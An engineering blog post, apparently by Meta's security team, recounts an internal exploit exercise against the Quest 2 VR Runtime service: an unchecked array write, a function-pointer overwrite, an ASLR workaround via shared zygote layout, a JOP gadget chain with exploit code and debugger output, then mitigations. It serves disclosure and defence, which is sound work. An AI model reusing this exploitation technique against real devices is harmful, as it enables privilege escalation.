Meta Quest 2: Defense through offense

By mullaned2002

September 12, 2023

Meta’s Native Assurance team regularly performs manual code reviews as part of our ongoing commitment to improve the security posture of Meta’s products.
In 2021, we discovered a vulnerability in the Meta Quest 2’s Android-based OS that never made it to production but helped us find new ways to improve the security of Meta Quest products.
We’re sharing our journey to get arbitrary native code execution in the privileged VR Runtime service on the Meta Quest 2 by exploiting a memory corruption vulnerability from an unprivileged application over Runtime IPC.

In 2021, the Native Assurance team at Meta (part of the Product Security organization) performed a code review on a privileged service called VR Runtime, which provides VR services to client applications on VROS, the Android Open Source Project (AOSP)-based OS for the Meta Quest product line. In the process, they found multiple memory corruption vulnerabilities that could be triggered by any installed application.

The vulnerability we chose to exploit never made it into production. To understand how exploitation could happen on VROS, we used this opportunity to write an elevation-of-privilege exploit that could execute arbitrary native code in VR Runtime. Doing so showed us concretely what exploitation could look like on VROS and gave us actionable items we’re using to improve the security posture of Meta Quest products.

An introduction to VROS

VROS is an in-house AOSP build that runs on the Meta Quest product line. It contains customizations on top of AOSP to provide the VR experience on Quest hardware, including firmware, kernel modifications, device drivers, system services, SELinux policies, and applications.

As an Android variant, VROS has many of the same security features as other modern Android systems. For example, it uses SELinux policies to reduce the attack surfaces exposed to unprivileged code running on the device. Because of these protections, modern Android exploits typically require chains of exploits against numerous vulnerabilities to gain control over a device. Attackers attempting to compromise VROS must overcome similar challenges.

Image source: https://source.android.com/docs/core/architecture

On VROS, VR applications are essentially regular Android applications. However, these applications communicate with a variety of system services and hardware to provide the VR experience to users.

VR Runtime

VR Runtime is a service that provides VR features such as time warp and composition to client VR applications. The service is contained within the com.oculus.vrruntimeservice process as part of the com.oculus.systemdriver (VrDriver.apk) package. The VrDriver package is installed to /system/priv-app/ in VROS, making com.oculus.vrruntimeservice a privileged service with the SELinux domain priv_app. This gives it permissions beyond those given to normal Android applications.

The VR Runtime service is built on a custom IPC called Runtime IPC that is developed by Meta. Runtime IPC uses UNIX pipes and ashmem shared memory regions to facilitate communication between clients and servers. A native broker process called runtimeipcbroker sits in the middle between clients and servers and manages the initial connection, after which clients and servers communicate directly with one another.

VR application / VR Runtime connections

All VR applications use Runtime IPC to connect to the VR Runtime server running in the com.oculus.vrruntimeservice process using either the VrApi or OpenXR API. The VrApi and OpenXR interfaces load a library dynamically from VrDriver.apk containing the client side of the VR Runtime implementation and use this under the hood to perform various VR operations supported by VR Runtime such as time warp.

This process can be summarized in a sequence of steps:

1. A loader is linked to all VR applications at build time. This makes it so VR apps can run on multiple products/versions.
2. When a VR app starts, the loader uses dlopen to load the vrapiimpl.so library installed as part of VrDriver.apk. The loader will obtain the addresses of functions within vrapiimpl.so associated with the public VrApi or OpenXR interface.
3. After the loader’s execution:
   - The VR application will create a Runtime IPC connection to the VR Runtime server running inside of com.oculus.vrruntimeservice.
   - This process is mediated by the native runtimeipcbroker process, which performs permissions checks and other hand-off responsibilities so that the client and server can communicate directly.
   - From this point forward the connection uses UNIX pipes and shared memory regions for client/server communication.

The VR Runtime attack surface

The default SELinux domain for most applications on VROS is untrusted_app. These applications include those that are installed from the Meta Quest Store as well as those that are sideloaded onto the device. The untrusted_app domain is restrictive and meant to contain the minimum SELinux permissions that an application should need.

Since untrusted applications can communicate with the more privileged VR Runtime server, this introduces an elevation-of-privilege risk. If an untrusted application is able to exploit a vulnerability in the VR Runtime code, it will be able to perform operations on the device reserved for privileged applications. Because of this, all inputs from untrusted applications to VR Runtime should be scrutinized heavily.

The most important inputs that VR Runtime processes from untrusted applications are those that originate from RPC requests and from read/write shared memory. The code that processes these inputs constitutes the attack surface of VR Runtime, as shown below:

Exploiting VR Runtime

Before diving into the vulnerability and its exploitation, let us explain the exploitation scenario that we considered.

Anyone who owns a Meta Quest headset is able to turn on developer mode, which allows users to sideload applications and have adb / shell access. This doesn’t mean users are able to get root on their devices, but it does give them a large amount of flexibility for interacting with the headset that they would not have otherwise.

We chose to pursue exploitation from the perspective of an application that escalates its privileges on the headset. Such an application could be intentionally malicious or be sideloaded by a user for jailbreaking purposes.

The vulnerability

The vulnerability that we chose for exploitation never made it into a production release, but it was introduced in a code commit in 2021. The commit added processing code for a new type of message that the VR Runtime could receive over Runtime IPC. Here is a redacted code snippet of what the vulnerability looked like:

REGISTER_RPC_HANDLER(
    SetPerformanceIdealFeatureState,
    [=](const uint32_t clientId,
        const SetPerformanceIdealFeatureStateRequest request,
        bool& response) {
      // …

      PerformanceManagerState->IdealFeaturesState.features_[static_cast<uint32_t>(request.Feature)]
          .status_ = request.Status;
      PerformanceManagerState->IdealFeaturesState.features_[static_cast<uint32_t>(request.Feature)]
          .fidelity_ = request.Fidelity;
      // …
      response = true;
      return reflect::RPCResult_Complete;
    })

The request parameter is an object that is built based on what is received over Runtime IPC. This means request.Feature, request.Status, and request.Fidelity are all attacker controlled. The PerformanceManagerState->IdealFeaturesState.features_ variable is a statically-sized array and lives in the .bss section of the libvrruntimeservice.so module. PerformanceManagerState->IdealFeaturesState.features_ is structured as follows:

enum class FeatureFidelity : uint32_t { … };
enum class FeatureStatus : uint32_t { … };
struct FeatureState {
  FeatureFidelity fidelity_;
  FeatureStatus status_;
};

struct FeaturesState {
  std::array<FeatureState, 31> features_;
};

Since request.Feature, request.Status, and request.Fidelity are attacker controlled, and PerformanceManagerState->IdealFeaturesState.features_ is a statically-sized array that the handler indexes without a bounds check, the vulnerability lets an attacker write 8 attacker-chosen bytes (the 4-byte fidelity_ and 4-byte status_ fields of one element) at an attacker-chosen offset past the start of the array, limited only by the 32-bit index. Any VR application can trigger this vulnerability by sending a specially crafted SetPerformanceIdealFeatureState Runtime IPC message. Moreover, the vulnerability is stable and can be repeated.
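To make the arithmetic concrete, here is a minimal sketch of how an index maps to a byte offset from the start of the array, together with a bounds-checked setter. The enum values, OffsetForIndex, and SetFeatureChecked are hypothetical names for illustration. The post does not show the actual fix, so the check below is only one conventional way such a handler could be hardened.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Stand-ins for the redacted enums; only their 32-bit underlying type matters.
enum class FeatureFidelity : uint32_t { Low = 0 };
enum class FeatureStatus : uint32_t { Off = 0 };

struct FeatureState {
  FeatureFidelity fidelity_;
  FeatureStatus status_;
};
static_assert(sizeof(FeatureState) == 8, "two 32-bit fields, no padding");

constexpr std::size_t kFeatureCount = 31;

// Byte offset, relative to the start of features_, that an unchecked
// features_[index] access would touch.
constexpr uint64_t OffsetForIndex(uint32_t index) {
  return static_cast<uint64_t>(index) * sizeof(FeatureState);
}

// Hypothetical hardened setter: rejects any index outside the array
// instead of writing through it.
bool SetFeatureChecked(std::array<FeatureState, kFeatureCount>& features,
                       uint32_t index,
                       FeatureFidelity fidelity,
                       FeatureStatus status) {
  if (index >= features.size()) {
    return false;
  }
  features[index] = FeatureState{fidelity, status};
  return true;
}
```

Under these assumptions, index 30 is the last valid element (offset 240), index 31 is the first out-of-bounds write (offset 248), and the largest 32-bit index reaches offset 0x7FFFFFFF8. Because the index is unsigned, only memory after the array is reachable.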

Hijacking control-flow

The end goal for our exploit was arbitrary native code execution. We needed to turn this 8-byte write vulnerability into something useful for an attacker. The first step was to find a corruption target to take control of the program counter.

Thankfully for us, VR Runtime is a complex stateful piece of software and there are a lot of interesting potential targets inside its .bss section. The ideal corruption target for us was a function pointer that:

Is stored at an arbitrary offset right after the global array. This is important because it means we can use the 8-byte write primitive to corrupt and control its value.
Has an attacker-reachable call site that invokes it. This is important because without a call site invoking the function pointer, we can’t take over the control flow.

To enumerate the corruption targets that were reachable from the write primitive, we used Ghidra to manually analyze the layout of the .bss section of the libvrruntimeservice.so binary. First, we located where the array is stored in the section. This location corresponds to the beginning of the PerformanceManagerState->IdealFeaturesState.features_ array that you can see below.

We then searched for forward-reachable corruption targets that were contained within the libvrruntimeservice.so binary. Lucky for us, we found an array of function pointers that are dynamically resolved at runtime and stored within a global instance of an ovrVulkanLoader object. The function pointers contained within ovrVulkanLoader point into the libvulkan.so module providing the Vulkan interface. Calls through these Vulkan function pointers can be triggered indirectly by attacker-controlled inputs over RPC. These two properties satisfy the two exploitation criteria we mentioned earlier.

With that in mind, we looked for a function pointer that we knew could be invoked indirectly from an RPC command. We chose to overwrite the vkGetPhysicalDeviceImageFormatProperties function pointer, which can be called from a control flow originating from the CreateSwapChain Runtime IPC RPC command.

Below is a decompilation output of the CreateTextureSwapChainVulkan function that invokes the vkGetPhysicalDeviceImageFormatProperties function pointer:

To hijack control flow, we first used the write primitive to corrupt the vkGetPhysicalDeviceImageFormatProperties function pointer and then crafted an RPC command that triggered the CreateTextureSwapChainVulkan function. This eventually allowed us to control the program counter:

Bypassing Address Space Layout Randomization (ASLR)

We had turned the corruption primitive into control over the target’s program counter. The next obstacle was Address Space Layout Randomization (ASLR), an exploit mitigation that makes it difficult for exploits to predict the address space of the target. Because of ASLR, we had no knowledge of the target address space: we didn’t know where libraries were loaded or where the heap or stack was. Knowing these locations is extremely useful for an attacker because they can redirect the execution flow to loaded libraries and reuse some of their code. This technique is known as jump-oriented programming (JOP) or return-oriented programming (a specific case of JOP).

Bypassing ASLR is a common problem in modern exploitation and the answer is usually to:

Find or manufacture a way to leak hints about the address-space (function addresses, saved-return addresses, heap pointers, etc.).
Find another way.

We explored both of those options and eventually stumbled upon something rather interesting:

$ adb shell ps -A
USER PID PPID VSZ RSS WCHAN ADDR S NAME
root 694 1 5367252 128760 poll_schedule_timeout 0 S zygote64
u0_a5 1898 694 5801656 112280 ptrace_stop 0 t com.oculus.vrruntimeservice
u0_a80 7519 694 5383760 104720 do_epoll_wait 0 S com.oculus.vrexploit

In the above, you can see that our application and our target have been forked off the zygote64 process. The result is that our process inherits the same address space from the zygote64 process as the VR Runtime process. This means that the loaded libraries in the zygote64 process at fork time will be loaded at the same addresses in both of those processes.
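The inheritance described above is a general property of fork without a subsequent exec. As a minimal sketch on a generic POSIX system (not VROS-specific code), the function below forks a child, has it report the address at which it sees a libc function, and compares that with the parent’s view. The name ForkedChildSharesLayout is hypothetical.

```cpp
#include <cassert>
#include <cstdint>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Forks a child, lets it report where it sees getpid(), and checks that the
// address matches the parent's. No exec happens, so the child keeps the
// parent's mappings, just as zygote children keep zygote's.
bool ForkedChildSharesLayout() {
  int fds[2];
  if (pipe(fds) != 0) {
    return false;
  }
  const uintptr_t parentView = reinterpret_cast<uintptr_t>(&getpid);
  const pid_t pid = fork();
  if (pid < 0) {
    close(fds[0]);
    close(fds[1]);
    return false;
  }
  if (pid == 0) {
    // Child: send our view of the address back through the pipe.
    const uintptr_t childView = reinterpret_cast<uintptr_t>(&getpid);
    const ssize_t written = write(fds[1], &childView, sizeof(childView));
    _exit(written == static_cast<ssize_t>(sizeof(childView)) ? 0 : 1);
  }
  // Parent: read the child's answer and reap it.
  close(fds[1]);
  uintptr_t childView = 0;
  const ssize_t got = read(fds[0], &childView, sizeof(childView));
  close(fds[0]);
  int status = 0;
  waitpid(pid, &status, 0);
  return got == static_cast<ssize_t>(sizeof(childView)) && childView == parentView;
}
```

Two siblings forked from the same parent are in the same position relative to each other, which is the situation of the exploit application and com.oculus.vrruntimeservice in the ps output.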

This shared layout is extremely useful: we no longer needed to break ASLR, because we already knew where numerous libraries reside in the target’s memory. The example below shows the libc.so module loaded at 0x7dae043000 in both processes:

$ adb shell cat /proc/1898/maps | grep libc.so
7dae043000-7dae084000 r--p 00000000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae084000-7dae11e000 --xp 00040000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae11e000-7dae126000 r--p 000d9000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae126000-7dae129000 rw-p 000e0000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so

$ adb shell cat /proc/7519/maps | grep libc.so
7dae043000-7dae084000 r--p 00000000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae084000-7dae11e000 --xp 00040000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae11e000-7dae126000 r--p 000d9000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
7dae126000-7dae129000 rw-p 000e0000 fd:00 286 /apex/com.android.runtime/lib64/bionic/libc.so
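A process can read its own /proc/self/maps to learn these base addresses. The sketch below shows one way to extract a module’s base from text in that format. FindModuleBase is a hypothetical helper, not code from the exploit, and it assumes each relevant line ends with the mapped file’s path.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <sstream>
#include <string>

// Scans text in /proc/<pid>/maps format and stores in *baseOut the lowest
// start address of any mapping whose path ends with `librarySuffix`.
// Returns false if no such mapping exists.
bool FindModuleBase(const std::string& mapsText,
                    const std::string& librarySuffix,
                    uint64_t* baseOut) {
  std::istringstream lines(mapsText);
  std::string line;
  bool found = false;
  uint64_t lowest = 0;
  while (std::getline(lines, line)) {
    // Keep only lines whose trailing path matches the requested suffix.
    if (line.size() < librarySuffix.size() ||
        line.compare(line.size() - librarySuffix.size(),
                     librarySuffix.size(), librarySuffix) != 0) {
      continue;
    }
    // The first field is "<start>-<end>" in hexadecimal.
    const std::size_t dash = line.find('-');
    if (dash == std::string::npos) {
      continue;
    }
    const uint64_t start = std::stoull(line.substr(0, dash), nullptr, 16);
    if (!found || start < lowest) {
      lowest = start;
      found = true;
    }
  }
  if (found) {
    *baseOut = lowest;
  }
  return found;
}
```

Passing a suffix with a leading slash, such as "/libc.so", avoids matching a different library whose name merely ends in the same characters.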

Using this knowledge, we enumerated all shared libraries in both address spaces and looked for code reuse gadgets in them. At this point there were literally millions of code reuse gadgets in a file that we needed to sift through to assemble a JOP chain and accomplish our goal.

…
0x240b4: ldr x8, [x0]; ldr x8, [x8, #0x40]; blr x8;
0x23ad0: ldr x8, [x0]; ldr x8, [x8, #0x48]; blr x8;
0x23ab0: ldr x8, [x0]; ldr x8, [x8, #0x50]; blr x8;
0x24040: ldr x8, [x0]; ldr x8, [x8, #0x70]; blr x8;
0x23100: ldr x8, [x0]; ldr x8, [x8, #8]; blr x8;
0x23ae0: ldr x8, [x0]; ldr x8, [x8]; blr x8;
0x22ba8: ldr x8, [x0]; ldr x9, [x8, #0x30]; add x8, sp, #8; blr x9;
0x231e0: ldr x8, [x0]; mov x19, x0; ldr x8, [x8, #0x58]; blr x8;
0x208fc: ldr x8, [x0]; rev x0, x8; ret;
0x231f0: ldr x8, [x19]; mov w20, w0; mov x0, x19; ldr x8, [x8, #0x60]; blr x8;
0x22de4: ldr x8, [x1]; mov x0, x1; ldr x8, [x8, #0x70]; blr x8;
0x179e4: ldr x8, [x20], #0x10; sub x19, x19, #1; ldr x8, [x8]; blr x8;
0x17ea4: ldr x8, [x21]; mov x0, x21; ldr x8, [x8, #0x10]; blr x8;
0x23b0c: ldr x8, [x21]; mov x0, x21; mov x1, x20; ldr x8, [x8, #0x48]; blr x8;
0x17b38: ldr x8, [x22], #0x10; mov x0, x21; ldr x8, [x8]; blr x8;
0x17ad8: ldr x8, [x22], #0xfffffffffffffff0; mov x0, x21; ldr x8, [x8]; blr x8;
0x23be0: ldr x8, [x22]; mov w23, w0; mov x0, x22; ldr x8, [x8, #0x60]; blr x8;

We now had control over the execution flow, knew where a large subset of libraries loaded in the VR Runtime are placed in memory, and had a list of code reuse gadgets. The next step was to actually write the exploit to execute a payload of our choosing in the VR Runtime process.
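Sifting through a gadget listing like the one above can be partly automated. The following is a minimal sketch, assuming each gadget is a line of the form "address: insn; insn; ...;". It keeps only gadgets that contain a wanted instruction and end in an indirect call, so control flow can continue afterwards. SplitGadget and FilterGadgets are hypothetical helpers; the post does not describe the tooling actually used.

```cpp
#include <cassert>
#include <cstddef>
#include <sstream>
#include <string>
#include <vector>

// Strips leading and trailing spaces and tabs.
static std::string Trim(const std::string& s) {
  const std::size_t first = s.find_first_not_of(" \t");
  if (first == std::string::npos) {
    return "";
  }
  const std::size_t last = s.find_last_not_of(" \t");
  return s.substr(first, last - first + 1);
}

// Splits "0x17ea4: ldr x8, [x21]; mov x0, x21; blr x8;" into its instructions,
// dropping the leading address.
std::vector<std::string> SplitGadget(const std::string& line) {
  std::vector<std::string> instructions;
  const std::size_t colon = line.find(':');
  std::istringstream body(colon == std::string::npos ? line : line.substr(colon + 1));
  std::string piece;
  while (std::getline(body, piece, ';')) {
    const std::string insn = Trim(piece);
    if (!insn.empty()) {
      instructions.push_back(insn);
    }
  }
  return instructions;
}

// Keeps gadgets that contain `wanted` as an exact instruction and whose final
// instruction is an indirect call (blr).
std::vector<std::string> FilterGadgets(const std::vector<std::string>& gadgets,
                                       const std::string& wanted) {
  std::vector<std::string> kept;
  for (const std::string& gadget : gadgets) {
    const std::vector<std::string> insns = SplitGadget(gadget);
    if (insns.empty() || insns.back().compare(0, 4, "blr ") != 0) {
      continue;
    }
    for (const std::string& insn : insns) {
      if (insn == wanted) {
        kept.push_back(gadget);
        break;
      }
    }
  }
  return kept;
}
```

Matching whole instructions rather than substrings matters here: a substring search for "mov x0, x2" would also match "mov x0, x21" and "mov x0, x22".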

Exploitation

As a reminder, our exploitation scenario was from the perspective of an already installed untrusted application. Our approach for exploitation was to get the VR Runtime process to load a shared library using dlopen from our application APK. When VR Runtime loaded the library, our payload would be executed automatically as part of the loaded library’s initialization function.

Accomplishing this meant we needed a JOP chain that performed the following sequence of operations:

Assign a pointer to $x0 (the first function argument in the ARM64 ABI) pointing to a path of a shared module we placed in our exploit APK.
Redirect the program counter to dlopen.

To build our JOP chain we filtered the list of gadgets based on the registers and memory we controlled at the time of hijack. The state at the time of the hijack is illustrated below:

Recall that the $x0 register at the time of the control flow transfer to dlopen corresponds to the path argument. The problem we now had to solve was how do we load $x0 with a pointer to a string we control? This is tricky because the only place we were able to insert controlled data is the .bss section of the target. But we didn’t know its location in memory, so we couldn’t hardcode its address.

One thing that was very helpful for us is that there happened to be a pointer to the .bss section (ovrVulkanLoader) in the $x21 register at the time of control flow hijack. This meant that in theory we could simply move $x21 or a value offset from $x21 into $x0. This would give us our controlled path argument to dlopen, solving our problem.

After hours of sifting through gadgets, we eventually found one that did exactly what we needed and also allowed us to keep control flow:

ldr x2,[x21 , #0x80 ]
mov w1,#0x1000
mov x0,x21
blr x2

We could then use another gadget to set $x1 (the second function argument in the ARM64 ABI) to a sane value and invoke dlopen:

mov w1,#0x2
bl <EXTERNAL>::dlopen undefined dlopen()

Luckily, the write vulnerability we used in the exploit was also repeatable. This meant that we could overwrite multiple locations in memory offset from $x21 (ovrVulkanLoader). We ended up using multiple RPC commands to overwrite memory in the way we needed for setting up our gadget state and only afterwards triggering the control flow hijack.

Using this approach, we set up the gadget state to combine the two gadgets above and were able to load our shared module giving us arbitrary native code execution:

// Corrupt the `vulkanLoader.vkGetPhysicalDeviceImageFormatProperties` pointer which is
// at +0x68. We hijack control flow by triggering a function call in
// ovrSwapChain::CreateTextureSwapChainVulkan.
// First gadget in eglSubDriverAndroid.so
// 0010b3ac a2 42 40 f9 ldr x2,[x21 , #0x80 ]
// 0010b3b0 e1 03 14 32 mov w1,#0x1000
// 0010b3b4 e0 03 15 aa mov x0,x21
// 0010b3b8 40 00 3f d6 blr x2
const uint64_t vkGetPhysicalDeviceImageFormatPropertiesOffset = VulkanLoaderOffset + 0x68;
const uint64_t FirstGadget = ModuleMap.at("eglSubDriverAndroid.so") + 0xb3'ac;
Corruptions.emplace_back(vkGetPhysicalDeviceImageFormatPropertiesOffset, FirstGadget);

// Second gadget in libcutils.so:
// 0010bc78 41 00 80 52 mov w1,#0x2
// 0010bc7c ad 0d 00 94 bl <EXTERNAL>::dlopen undefined dlopen()
const uint64_t SecondGadget = ModuleMap.at("/system/lib64/libcutils.so") + 0xbc'78;
Corruptions.emplace_back(VulkanLoaderOffset + 0x80, SecondGadget);
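The snippet above shows only the two pointer overwrites. The post does not show how longer data, such as a path string, was laid out in memory. As a sketch under the assumption that each write places one 8-byte little-endian value at a given offset, a string could be split into (offset, value) pairs like this. PlanStringWrites and its baseOffset parameter are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

// Splits `text` (plus its terminating NUL) into 8-byte little-endian values,
// pairing each value with the offset it would be written to. The final chunk
// is zero-padded.
std::vector<std::pair<uint64_t, uint64_t>> PlanStringWrites(uint64_t baseOffset,
                                                            const std::string& text) {
  std::vector<std::pair<uint64_t, uint64_t>> writes;
  const std::size_t total = text.size() + 1;  // include the terminating NUL
  for (std::size_t i = 0; i < total; i += 8) {
    unsigned char bytes[8] = {0};
    const std::size_t count = (total - i < 8) ? (total - i) : 8;
    std::memcpy(bytes, text.c_str() + i, count);
    // Assemble the bytes so that bytes[0] ends up at the lowest address.
    uint64_t value = 0;
    for (int b = 7; b >= 0; --b) {
      value = (value << 8) | bytes[b];
    }
    writes.emplace_back(baseOffset + i, value);
  }
  return writes;
}
```

Each resulting pair has the same (offset, value) shape as the entries passed to Corruptions.emplace_back above.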

And below is what it looked like from GDB (GNU Debugger):

(gdb) break *0x7c98012c78
Breakpoint 1 at 0x7c98012c78

(gdb) c
Continuing.
Thread 41 "Thread-15" hit Breakpoint 1, 0x0000007c98012c78 in ?? ()

(gdb) x/s $x0
0x7bb11633e8: "/data/app/com.oculus.vrexploit-OjL813hdSAtlc3fEkJKdrg==/lib/arm64/libinject-arm64.so"

(gdb) c
Continuing.
warning: Could not load shared library symbols for /data/app/com.oculus.vrexploit-OjL813hdSAtlc3fEkJKdrg==/lib/arm64/libinject-arm64.so.

At that point, we had accomplished our goal and were able to execute arbitrary native code in the VR Runtime process.

What we learned

We tried to derive as much value out of the exercise as possible with a focus on actionable items we could use to improve the security posture of Meta products. We won’t list all the outcomes in this post but here are some of the most notable.

RELRO for function pointers in RW global memory

One of the patterns we noticed early in the exercise was that the VR Runtime service contained many function pointers in global memory. The VR Runtime process loads these function pointers early in its initialization by first calling dlopen on certain system installed libraries and then using dlsym to assign a given function pointer with its associated address.

This approach gives developers the flexibility to use vendor libraries that provide a common API across products (e.g., libvulkan.so). The downside is that the function pointers are stored in readable and writable memory, making them prime targets for memory corruption-based overwrites. In VR Runtime’s case, they were stored in global readable and writable memory that happened to be reachable from our out-of-bounds write exploitation primitive. Additionally, these function pointers are not protected by compiler mitigations such as control flow integrity.

As an outcome of our exploitation exercise, we explored different strategies to protect these function pointers after their initial assignment. One strategy was to try and mirror the well-known full relocation read-only (RELRO) mitigation that is used to protect pointers to functions in other libraries computed by the dynamic linker at load time. In full RELRO, the mappings containing these pointers are made read-only after they are initialized, which prevents malicious writes from overwriting their contents.

We made multiple changes to the VR Runtime code to mark function pointers in global memory to be read only after we initialized them. Had this protection been in place it would have made our exploitation much more difficult. We are now working on generalizing this approach by building an LLVM compiler pass that implements the technique.
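The general idea can be sketched with standard POSIX calls. This is a minimal illustration, not the VR Runtime change itself: it assumes the function pointers live in a table allocated on its own pages, so that mprotect can make the table read-only without affecting unrelated globals. FunctionTable, AllocateTable, SealTable, and AddOne are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <sys/mman.h>
#include <unistd.h>

using GenericFn = int (*)(int);

// Hypothetical table of late-bound function pointers.
struct FunctionTable {
  GenericFn entries[16];
};

// Stand-in for a function whose address would normally come from dlsym.
int AddOne(int value) { return value + 1; }

// Size of the table rounded up to a whole number of pages.
static std::size_t TableMappingSize() {
  const std::size_t page = static_cast<std::size_t>(sysconf(_SC_PAGESIZE));
  return ((sizeof(FunctionTable) + page - 1) / page) * page;
}

// Allocates the table on its own page-aligned mapping so it can be protected
// independently of other writable data. Returns nullptr on failure.
FunctionTable* AllocateTable() {
  void* mem = mmap(nullptr, TableMappingSize(), PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  return mem == MAP_FAILED ? nullptr : static_cast<FunctionTable*>(mem);
}

// Drops write permission once every pointer has been assigned. Later writes
// to the table fault instead of silently replacing a pointer.
bool SealTable(FunctionTable* table) {
  return mprotect(table, TableMappingSize(), PROT_READ) == 0;
}
```

A caller would fill the entries during initialization, call SealTable once, and continue to call through the table as before. Calls only read the pointers, so they are unaffected by the protection change.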

Thoughts on SELinux

One of the most frustrating things for us during exploit development was the constraints imposed on us by SELinux. With that said, we were pleasantly surprised that we could load a .so library out of an untrusted application’s data directory as a privileged application. This is because Android’s default SELinux policy enables privileged applications (typically running in the platform_app, system_app, or priv_app domains) to execute code under /data/app, which is where untrusted applications are commonly installed.

Android supports this behavior because it allows for updates to privileged applications outside of OTA updates. This allows privileged applications signed with the same certificate as the original to be updated in a more lightweight manner. An updated privileged application is installed to /data/app, but retains its privileged SELinux context.

While we did not develop a solution to this issue, we feel it’s worth calling out as a potential area for improvement on Android. In general, we don’t believe that privileged applications should be able to execute code owned by lesser privileged applications.

About Meta’s Native Assurance team

The Meta Native Assurance team that performed this exploit exercise is part of a larger product security group that performs proactive security work on Meta’s products. Some examples of this work include fuzzing, static analysis, architecture/implementation reviews, attack surface reduction, exploit mitigations, and more. In addition, Meta also offers a bug bounty program to incentivize security research across its entire external attack surface, including the VR and AR products.

The post Meta Quest 2: Defense through offense appeared first on Engineering at Meta.
